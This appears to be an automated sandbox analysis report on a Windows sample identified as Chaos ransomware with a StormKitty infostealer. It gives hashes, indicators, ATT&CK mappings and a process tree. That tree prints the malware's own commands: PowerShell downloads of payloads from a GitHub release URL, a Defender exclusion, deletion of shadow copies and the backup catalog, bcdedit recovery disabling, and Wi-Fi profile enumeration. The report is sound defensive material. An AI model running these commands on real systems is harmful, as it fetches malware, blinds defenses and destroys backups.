Analysis
max time kernel: 106s
max time network: 145s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23/03/2025, 02:34
Behavioral task: behavioral1
Sample: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
Resource: win7-20241010-en

Behavioral task: behavioral2
Sample: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
Resource: win10v2004-20250314-en
General
Target: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
Size: 57KB
MD5: 16edd47bf01716b24958a0b3a3a7bcfb
SHA1: 8b7972f4190c2ca9d600084611e966fa0f899b98
SHA256: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
SHA512: 9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
SSDEEP: 768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures

Chaos
Ransomware family first seen in June 2021.

Chaos Ransomware (2 IoCs)
resource | yara_rule
behavioral2/files/0x000e0000000240ca-46.dat | family_chaos
behavioral2/memory/1960-48-0x0000000000BF0000-0x0000000000C18000-memory.dmp | family_chaos

Chaos family

StormKitty
StormKitty is an open source info stealer written in C#.

StormKitty payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x0008000000024276-50.dat | family_stormkitty
behavioral2/memory/4932-62-0x0000000000240000-0x000000000027C000-memory.dmp | family_stormkitty

Stormkitty family
Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
pid | Process
5520 | bcdedit.exe
5080 | bcdedit.exe

Blocklisted process makes network request (4 IoCs)
flow | pid | Process
10 | 4328 | powershell.exe
16 | 4328 | powershell.exe
34 | 4260 | powershell.exe
35 | 4260 | powershell.exe

Deletes backup catalog (1 IoCs)
pid | Process
4824 | wbadmin.exe
Disables Task Manager via registry modification

Downloads MZ/PE file (2 IoCs)
flow | pid | Process
35 | 4260 | powershell.exe
16 | 4328 | powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation | build.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation | svchost.exe

Drops startup file (3 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url | svchost.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | svchost.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt | svchost.exe

Executes dropped EXE (3 IoCs)
pid | Process
1960 | build.exe
4932 | kernelv.exe
1744 | svchost.exe

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | kernelv.exe
Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | kernelv.exe
Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | kernelv.exe

Command and Scripting Interpreter: PowerShell (3 IoCs)
pid | Process
2124 | powershell.exe
4328 | powershell.exe
4260 | powershell.exe
Drops desktop.ini file(s) (64 IoCs)
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
36 | ipinfo.io
37 | ipinfo.io

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\64irrs21e.jpg" | svchost.exe

yara_rule upx (2 IoCs)
resource | yara_rule
behavioral2/memory/5516-0-0x0000000140000000-0x0000000140028000-memory.dmp | upx
behavioral2/memory/5516-66-0x0000000140000000-0x0000000140028000-memory.dmp | upx

Hide Artifacts: Ignore Process Interrupts (1 TTPs, 2 IoCs)
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid | Process
2124 | powershell.exe
844 | powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 6 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe

Program crash (1 IoCs)
pid | pid_target | Process | procid_target
3044 | 4932 | WerFault.exe | 104
System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | chcp.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | netsh.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | kernelv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | chcp.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | netsh.exe
System Network Configuration Discovery: Wi-Fi Discovery (1 TTPs, 2 IoCs)
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid | Process
5064 | cmd.exe
6080 | netsh.exe

Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | kernelv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | kernelv.exe

Interacts with shadow copies (3 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
4064 | vssadmin.exe

Modifies registry class (1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings | svchost.exe

Opens file in notepad (likely ransom note) (1 IoCs)
pid | Process
3092 | NOTEPAD.EXE

Runs net.exe

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid | Process
1744 | svchost.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious use of AdjustPrivilegeToken (55 IoCs)
Suspicious use of WriteProcessMemory (60 IoCs)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.

outlook_office_path (1 IoCs)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | kernelv.exe

outlook_win_path (1 IoCs)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | kernelv.exe
Processes

C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
  Command: "C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"
  PID: 5516
  Signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      Command: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8211.tmp\8212.tmp\8222.bat C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"
      PID: 1720
      Signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net.exe
          Command: net session
          PID: 524
          Signatures: Suspicious use of WriteProcessMemory
            C:\Windows\system32\net1.exe
              Command: C:\Windows\system32\net1 session
              PID: 3752
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          PID: 2124
          Signatures: Command and Scripting Interpreter: PowerShell; Hide Artifacts: Ignore Process Interrupts; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          PID: 4328
          Signatures: Blocklisted process makes network request; Downloads MZ/PE file; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          PID: 4260
          Signatures: Blocklisted process makes network request; Downloads MZ/PE file; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Local\Temp\build.exe
          Command: "C:\Users\Admin\AppData\Local\Temp\build.exe"
          PID: 1960
          Signatures: Checks computer location settings; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Roaming\svchost.exe
              Command: "C:\Users\Admin\AppData\Roaming\svchost.exe"
              PID: 1744
              Signatures: Checks computer location settings; Drops startup file; Executes dropped EXE; Drops desktop.ini file(s); Sets desktop wallpaper using registry; Modifies registry class; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
                C:\Windows\System32\cmd.exe
                  Command: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                  PID: 3460
                  Signatures: Suspicious use of WriteProcessMemory
                    C:\Windows\system32\vssadmin.exe
                      Command: vssadmin delete shadows /all /quiet
                      PID: 4064
                      Signatures: Interacts with shadow copies
                    C:\Windows\System32\Wbem\WMIC.exe
                      Command: wmic shadowcopy delete
                      PID: 6108
                      Signatures: Suspicious use of AdjustPrivilegeToken
                C:\Windows\System32\cmd.exe
                  Command: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  PID: 1436
                  Signatures: Suspicious use of WriteProcessMemory
                    C:\Windows\system32\bcdedit.exe
                      Command: bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      PID: 5520
                      Signatures: Modifies boot configuration data using bcdedit
                    C:\Windows\system32\bcdedit.exe
                      Command: bcdedit /set {default} recoveryenabled no
                      PID: 5080
                      Signatures: Modifies boot configuration data using bcdedit
                C:\Windows\System32\cmd.exe
                  Command: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  PID: 5952
                  Signatures: Suspicious use of WriteProcessMemory
                    C:\Windows\system32\wbadmin.exe
                      Command: wbadmin delete catalog -quiet
                      PID: 4824
                      Signatures: Deletes backup catalog
                C:\Windows\system32\NOTEPAD.EXE
                  Command: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
                  PID: 3092
                  Signatures: Opens file in notepad (likely ransom note)
        C:\Users\Admin\AppData\Local\Temp\kernelv.exe
          Command: "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
          PID: 4932
          Signatures: Executes dropped EXE; Accesses Microsoft Outlook profiles; System Location Discovery: System Language Discovery; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; outlook_office_path; outlook_win_path
            C:\Windows\SysWOW64\cmd.exe
              Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
              PID: 5064
              Signatures: System Location Discovery: System Language Discovery; System Network Configuration Discovery: Wi-Fi Discovery; Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\chcp.com
                  Command: chcp 65001
                  PID: 3728
                  Signatures: System Location Discovery: System Language Discovery
                C:\Windows\SysWOW64\netsh.exe
                  Command: netsh wlan show profile
                  PID: 6080
                  Signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery; System Network Configuration Discovery: Wi-Fi Discovery
                C:\Windows\SysWOW64\findstr.exe
                  Command: findstr All
                  PID: 6028
                  Signatures: System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\WerFault.exe
              Command: C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 2456
              PID: 3044
              Signatures: Program crash
            C:\Windows\SysWOW64\cmd.exe
              Command: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
              PID: 2988
              Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\chcp.com
                  Command: chcp 65001
                  PID: 5460
                  Signatures: System Location Discovery: System Language Discovery
                C:\Windows\SysWOW64\netsh.exe
                  Command: netsh wlan show networks mode=bssid
                  PID: 5112
                  Signatures: Event Triggered Execution: Netsh Helper DLL; System Location Discovery: System Language Discovery
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command: powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          PID: 844
          Signatures: Hide Artifacts: Ignore Process Interrupts; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\WerFault.exe
  Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4932 -ip 4932
  PID: 5900

C:\Windows\system32\vssvc.exe
  Command: C:\Windows\system32\vssvc.exe
  PID: 4628
  Signatures: Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbengine.exe
  Command: "C:\Windows\system32\wbengine.exe"
  PID: 4584
  Signatures: Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\vdsldr.exe
  Command: C:\Windows\System32\vdsldr.exe -Embedding
  PID: 4792

C:\Windows\System32\vds.exe
  Command: C:\Windows\System32\vds.exe
  PID: 4868
  Signatures: Checks SCSI registry key(s)
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter: 2
    PowerShell: 1
  Windows Management Instrumentation: 1
Defense Evasion
  Direct Volume Access: 1
  Hide Artifacts: 1
    Ignore Process Interrupts: 1
  Indicator Removal: 3
    File Deletion: 3
  Modify Registry: 1
Credential Access
  Credentials from Password Stores: 1
    Credentials from Web Browsers: 1
  Unsecured Credentials: 1
    Credentials In Files: 1
Downloads